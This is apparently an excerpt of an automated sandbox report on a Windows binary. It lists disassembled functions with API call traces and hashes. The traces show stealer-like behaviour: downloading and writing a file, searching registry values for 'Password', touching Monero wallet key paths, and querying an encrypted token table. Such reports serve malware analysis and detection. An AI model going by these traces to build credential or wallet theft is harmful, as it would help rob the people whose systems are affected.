                                Memory Dump Source
                                • Source File: 00000000.00000002.1795411098.0000000000D81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D80000, based on PE: true
                                • Associated: 00000000.00000002.1795391761.0000000000D80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795411098.0000000000E31000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795411098.0000000000E3D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795411098.0000000000E62000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795411098.0000000000FCA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.0000000000FDE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.0000000001161000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.000000000123B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.000000000125E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.0000000001265000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.0000000001274000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795862466.0000000001275000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795970084.000000000140C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795984485.000000000140D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d80000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap__aulldiv$AllocateGlobalMemoryProcessStatuswsprintf
                                • String ID: %d MB$@
                                • API String ID: 2774356765-3474575989
                                • Opcode ID: 1f77b37c83877f741556bcd4848e49a725f0fa598db8f5876dd45390e2bc6c16
                                • Instruction ID: 4207f82bf1b09a954ff419350017d5d7566ca1547c2fa53433b06383d0f1a3e6
                                • Opcode Fuzzy Hash: 1f77b37c83877f741556bcd4848e49a725f0fa598db8f5876dd45390e2bc6c16
                                • Instruction Fuzzy Hash: BF21F7B1E44218ABDB00DFD4CD4AFAEB7B8EB45B14F104609F605BB280D778A9018BB5
                                Function 00D860A0 Relevance: 13.6, APIs: 9, Instructions: 133networkfileCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00D9A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00D9A7E6
                                  • Part of subcall function 00D847B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00D84839
                                  • Part of subcall function 00D847B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00D84849
                                • InternetOpenA.WININET(00DA0DF7,00000001,00000000,00000000,00000000), ref: 00D8610F
                                • StrCmpCA.SHLWAPI(?,0182EB68), ref: 00D86147
                                • InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,00000100,00000000), ref: 00D8618F
                                • CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 00D861B3
                                • InternetReadFile.WININET(?,?,00000400,?), ref: 00D861DC
                                • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00D8620A
                                • CloseHandle.KERNEL32(?,?,00000400), ref: 00D86249
                                • InternetCloseHandle.WININET(?), ref: 00D86253
                                • InternetCloseHandle.WININET(00000000), ref: 00D86260
                                Memory Dump Source
                                • Source File: 00000000.00000002.1795411098.0000000000D81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D80000, based on PE: true
                                • Associated: 00000000.00000002.1795391761.0000000000D80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795411098.0000000000E31000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795411098.0000000000E3D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795411098.0000000000E62000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795411098.0000000000FCA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.0000000000FDE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.0000000001161000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.000000000123B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.000000000125E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.0000000001265000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.0000000001274000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795862466.0000000001275000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795970084.000000000140C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795984485.000000000140D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d80000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Internet$CloseFileHandle$Open$CrackCreateReadWritelstrcpylstrlen
                                • String ID:
                                • API String ID: 2507841554-0
                                • Opcode ID: c793f8cac17c3913c7305c4517dba8a033a2602044f620da8fe1f65848f876a1
                                • Instruction ID: 672951caa364d4963cdfdb3e58f52a301cece6cb78ed2ebe934ee48b23e904dd
                                • Opcode Fuzzy Hash: c793f8cac17c3913c7305c4517dba8a033a2602044f620da8fe1f65848f876a1
                                • Instruction Fuzzy Hash: 2F515EB190021CABDF20EF50DD4ABEE77B8FF44705F108198A605A7181DB74AA89DFA5
                                Function 00D872D0 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 149registrymemoryCOMMON
                                Download Yara Rule
                                APIs
                                • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 00D8733A
                                • RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 00D873B1
                                • StrStrA.SHLWAPI(00000000,Password,00000000), ref: 00D8740D
                                • GetProcessHeap.KERNEL32(00000000,?), ref: 00D87452
                                • HeapFree.KERNEL32(00000000), ref: 00D87459
                                • task.LIBCPMTD ref: 00D87555
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1795411098.0000000000D81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D80000, based on PE: true
                                • Associated: 00000000.00000002.1795391761.0000000000D80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795411098.0000000000E31000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795411098.0000000000E3D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795411098.0000000000E62000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795411098.0000000000FCA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.0000000000FDE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.0000000001161000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.000000000123B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.000000000125E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.0000000001265000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.0000000001274000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795862466.0000000001275000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795970084.000000000140C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795984485.000000000140D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d80000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$EnumFreeOpenProcessValuetask
                                • String ID: Password
                                • API String ID: 775622407-3434357891
                                • Opcode ID: e5802d6159fee6be384500b5c8dbe43f8aa623422a3c4f37417483921f884f7d
                                • Instruction ID: 365331db1d78f5f5b62f63056638e44d8d27ecc5659b78c9fd708f02fbeb7ceb
                                • Opcode Fuzzy Hash: e5802d6159fee6be384500b5c8dbe43f8aa623422a3c4f37417483921f884f7d
                                • Instruction Fuzzy Hash: CC6128B590422C9BDB24EB50CC45BDAB7B8FF44304F1481E9E689A6141DB70AAC9CFB0
                                Function 00D8BA80 Relevance: 12.3, APIs: 4, Strings: 4, Instructions: 284stringCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00D9A740: lstrcpy.KERNEL32(00DA0E17,00000000), ref: 00D9A788
                                  • Part of subcall function 00D9A9B0: lstrlen.KERNEL32(?,01829188,?,\Monero\wallet.keys,00DA0E17), ref: 00D9A9C5
                                  • Part of subcall function 00D9A9B0: lstrcpy.KERNEL32(00000000), ref: 00D9AA04
                                  • Part of subcall function 00D9A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00D9AA12
                                  • Part of subcall function 00D9A920: lstrcpy.KERNEL32(00000000,?), ref: 00D9A972
                                  • Part of subcall function 00D9A920: lstrcat.KERNEL32(00000000), ref: 00D9A982
                                  • Part of subcall function 00D9A8A0: lstrcpy.KERNEL32(?,00DA0E17), ref: 00D9A905
                                  • Part of subcall function 00D9A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00D9A7E6
                                • lstrlen.KERNEL32(00000000), ref: 00D8BC9F
                                  • Part of subcall function 00D98E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00D98E52
                                • StrStrA.SHLWAPI(00000000,AccountId), ref: 00D8BCCD
                                • lstrlen.KERNEL32(00000000), ref: 00D8BDA5
                                • lstrlen.KERNEL32(00000000), ref: 00D8BDB9
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1795411098.0000000000D81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D80000, based on PE: true
                                • Associated: 00000000.00000002.1795391761.0000000000D80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795411098.0000000000E31000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795411098.0000000000E3D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795411098.0000000000E62000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795411098.0000000000FCA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.0000000000FDE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.0000000001161000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.000000000123B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.000000000125E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.0000000001265000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.0000000001274000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795862466.0000000001275000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795970084.000000000140C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795984485.000000000140D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d80000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrlen$lstrcat$AllocLocal
                                • String ID: AccountId$AccountTokens$AccountTokens$SELECT service, encrypted_token FROM token_service
                                • API String ID: 3073930149-1079375795
                                • Opcode ID: a7edac55ab866a105126300a2c3f82e7b57c605286e17c7144efff6c689147e6
                                • Instruction ID: 1617e74fda4bed09da3c4b340d14e6146d66c9bdef39e195e7324456dd020c1f
                                • Opcode Fuzzy Hash: a7edac55ab866a105126300a2c3f82e7b57c605286e17c7144efff6c689147e6
                                • Instruction Fuzzy Hash: C0B12872920118ABDF04FBA8DD96EEE7378FF54300F444569F506A6091EF346A49CBB2
                                Function 00D96770 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 27COMMON
                                Download Yara Rule
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1795411098.0000000000D81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D80000, based on PE: true
                                • Associated: 00000000.00000002.1795391761.0000000000D80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795411098.0000000000E31000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795411098.0000000000E3D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795411098.0000000000E62000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795411098.0000000000FCA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.0000000000FDE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.0000000001161000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.000000000123B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.000000000125E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.0000000001265000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.0000000001274000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795862466.0000000001275000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795970084.000000000140C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795984485.000000000140D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d80000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: ExitProcess$DefaultLangUser
                                • String ID: *
                                • API String ID: 1494266314-163128923
                                • Opcode ID: f03054fb5e4bebe36ff7f748125532f9d8f4492d5bb9cd6fcbf1c814b10b1915
                                • Instruction ID: 29c1c14627c0e7dd5e4e3a2d1692a1f23c0e927382ed2179b34769419605ebfa
                                • Opcode Fuzzy Hash: f03054fb5e4bebe36ff7f748125532f9d8f4492d5bb9cd6fcbf1c814b10b1915
                                • Instruction Fuzzy Hash: E2F03A3090420DEFD7449FF0AE1EB2C7B70FB0470AF040199E60987690D670AA41ABA6
                                Function 00D84FB0 Relevance: 10.6, APIs: 7, Instructions: 83networkmemoryfileCOMMON
                                Download Yara Rule
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00D84FCA
                                • RtlAllocateHeap.NTDLL(00000000), ref: 00D84FD1
                                • InternetOpenA.WININET(00DA0DDF,00000000,00000000,00000000,00000000), ref: 00D84FEA
                                • InternetOpenUrlA.WININET(?,00000000,00000000,00000000,04000100,00000000), ref: 00D85011
                                • InternetReadFile.WININET(?,?,00000400,00000000), ref: 00D85041
                                • InternetCloseHandle.WININET(?), ref: 00D850B9
                                • InternetCloseHandle.WININET(?), ref: 00D850C6
                                Memory Dump Source
                                • Source File: 00000000.00000002.1795411098.0000000000D81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D80000, based on PE: true
                                • Associated: 00000000.00000002.1795391761.0000000000D80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795411098.0000000000E31000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795411098.0000000000E3D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795411098.0000000000E62000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795411098.0000000000FCA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.0000000000FDE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.0000000001161000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.000000000123B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.000000000125E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.0000000001265000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.0000000001274000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795862466.0000000001275000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795970084.000000000140C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795984485.000000000140D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d80000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Internet$CloseHandleHeapOpen$AllocateFileProcessRead
                                • String ID:
                                • API String ID: 3066467675-0
                                • Opcode ID: 23da1932d928b96bd22bf3655e19ccf8694aaebb449761881d210cad40fb3a51
                                • Instruction ID: 62ea9b2445e0251936d4d793b1dbf3ed81cc717fb91f1d12d0bcc31072e9a0bb
                                • Opcode Fuzzy Hash: 23da1932d928b96bd22bf3655e19ccf8694aaebb449761881d210cad40fb3a51
                                • Instruction Fuzzy Hash: 863107B5A0021CABDB20DF54DD85BDCB7B4FB48708F1081D9EA09A7280C7706AC59FA9
                                Function 00D983DC Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 64registrystringCOMMON
                                Download Yara Rule
                                APIs
                                • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00D98426
                                • wsprintfA.USER32 ref: 00D98459
                                • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 00D9847B
                                • RegCloseKey.ADVAPI32(00000000), ref: 00D9848C
                                • RegCloseKey.ADVAPI32(00000000), ref: 00D98499
                                  • Part of subcall function 00D9A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00D9A7E6
                                • RegQueryValueExA.ADVAPI32(00000000,0182E030,00000000,000F003F,?,00000400), ref: 00D984EC
                                • lstrlen.KERNEL32(?), ref: 00D98501
                                • RegQueryValueExA.ADVAPI32(00000000,0182DEE0,00000000,000F003F,?,00000400,00000000,?,?,00000000,?,00DA0B34), ref: 00D98599
                                • RegCloseKey.ADVAPI32(00000000), ref: 00D98608
                                • RegCloseKey.ADVAPI32(00000000), ref: 00D9861A
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1795411098.0000000000D81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D80000, based on PE: true
                                • Associated: 00000000.00000002.1795391761.0000000000D80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795411098.0000000000E31000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795411098.0000000000E3D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795411098.0000000000E62000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795411098.0000000000FCA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.0000000000FDE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.0000000001161000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.000000000123B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.000000000125E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.0000000001265000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.0000000001274000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795862466.0000000001275000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795970084.000000000140C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795984485.000000000140D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d80000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Close$QueryValue$EnumOpenlstrcpylstrlenwsprintf
                                • String ID: %s\%s
                                • API String ID: 3896182533-4073750446
                                • Opcode ID: 6d169f2b02d60ee2ab485083e4c619997487c315a5cca67b9c3151b9b90d5ffb
                                • Instruction ID: 628ae18a6d59eea19b7e1c290fe949e9006a577e915e9786e71be4c065ad3935
                                • Opcode Fuzzy Hash: 6d169f2b02d60ee2ab485083e4c619997487c315a5cca67b9c3151b9b90d5ffb
                                • Instruction Fuzzy Hash: 242105B191022CABDB24DB54DD85FE9B3B8FB48704F00C598E609A7180DF71AA85DFE4
                                Function 00D97690 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 43registrymemoryCOMMON
                                Download Yara Rule
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00D976A4
                                • RtlAllocateHeap.NTDLL(00000000), ref: 00D976AB
                                • RegOpenKeyExA.ADVAPI32(80000002,0181C0F0,00000000,00020119,00000000), ref: 00D976DD
                                • RegQueryValueExA.ADVAPI32(00000000,0182DF70,00000000,00000000,?,000000FF), ref: 00D976FE
                                • RegCloseKey.ADVAPI32(00000000), ref: 00D97708
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1795411098.0000000000D81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D80000, based on PE: true
                                • Associated: 00000000.00000002.1795391761.0000000000D80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795411098.0000000000E31000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795411098.0000000000E3D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795411098.0000000000E62000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795411098.0000000000FCA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.0000000000FDE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.0000000001161000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.000000000123B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.000000000125E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.0000000001265000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.0000000001274000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795862466.0000000001275000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795970084.000000000140C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795984485.000000000140D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d80000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                • String ID: Windows 11
                                • API String ID: 3225020163-2517555085
                                • Opcode ID: 21f03f7ff8cde05143f7faf28d43387846332f796712744bf898b53169469b7b
                                • Instruction ID: 5f4fe971c52d2f0c92dc1696d4bfc57615504951223d73f168830d2aafb455ee
                                • Opcode Fuzzy Hash: 21f03f7ff8cde05143f7faf28d43387846332f796712744bf898b53169469b7b
                                • Instruction Fuzzy Hash: 9B0162B5A0420CBBEB00DBE4DE4EF6EB7B8EB48705F104054FA04D7290D670A9049B61
                                Function 00D97720 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 42registrymemoryCOMMON
                                Download Yara Rule
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00D97734
                                • RtlAllocateHeap.NTDLL(00000000), ref: 00D9773B
                                • RegOpenKeyExA.ADVAPI32(80000002,0181C0F0,00000000,00020119,00D976B9), ref: 00D9775B
                                • RegQueryValueExA.ADVAPI32(00D976B9,CurrentBuildNumber,00000000,00000000,?,000000FF), ref: 00D9777A
                                • RegCloseKey.ADVAPI32(00D976B9), ref: 00D97784
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1795411098.0000000000D81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D80000, based on PE: true
                                • Associated: 00000000.00000002.1795391761.0000000000D80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795411098.0000000000E31000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795411098.0000000000E3D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795411098.0000000000E62000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795411098.0000000000FCA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.0000000000FDE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.0000000001161000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.000000000123B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.000000000125E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.0000000001265000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.0000000001274000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795862466.0000000001275000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795970084.000000000140C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795984485.000000000140D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d80000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                • String ID: CurrentBuildNumber
                                • API String ID: 3225020163-1022791448
                                • Opcode ID: f611384808915a196e59465d7a694dcebbcbb22e998f9105f33d4df373bba1d5
                                • Instruction ID: 22bc1acec9a648a01ca5f04daecbb232f313ca5ec4ef1f556f9304e96216f674
                                • Opcode Fuzzy Hash: f611384808915a196e59465d7a694dcebbcbb22e998f9105f33d4df373bba1d5
                                • Instruction Fuzzy Hash: 210112B5A4030CBFEB00DBE4DD4AFAEB7B8EF48705F104559FA05A7281DA716A009F61
                                Function 00D899C0 Relevance: 9.1, APIs: 6, Instructions: 82filememoryCOMMON
                                Download Yara Rule
                                APIs
                                • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00D899EC
                                • GetFileSizeEx.KERNEL32(000000FF,?), ref: 00D89A11
                                • LocalAlloc.KERNEL32(00000040,?), ref: 00D89A31
                                • ReadFile.KERNEL32(000000FF,?,00000000,00D8148F,00000000), ref: 00D89A5A
                                • LocalFree.KERNEL32(00D8148F), ref: 00D89A90
                                • CloseHandle.KERNEL32(000000FF), ref: 00D89A9A
                                Memory Dump Source
                                • Source File: 00000000.00000002.1795411098.0000000000D81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D80000, based on PE: true
                                • Associated: 00000000.00000002.1795391761.0000000000D80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795411098.0000000000E31000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795411098.0000000000E3D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795411098.0000000000E62000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795411098.0000000000FCA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.0000000000FDE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.0000000001161000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.000000000123B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.000000000125E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.0000000001265000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.0000000001274000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795862466.0000000001275000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795970084.000000000140C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795984485.000000000140D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
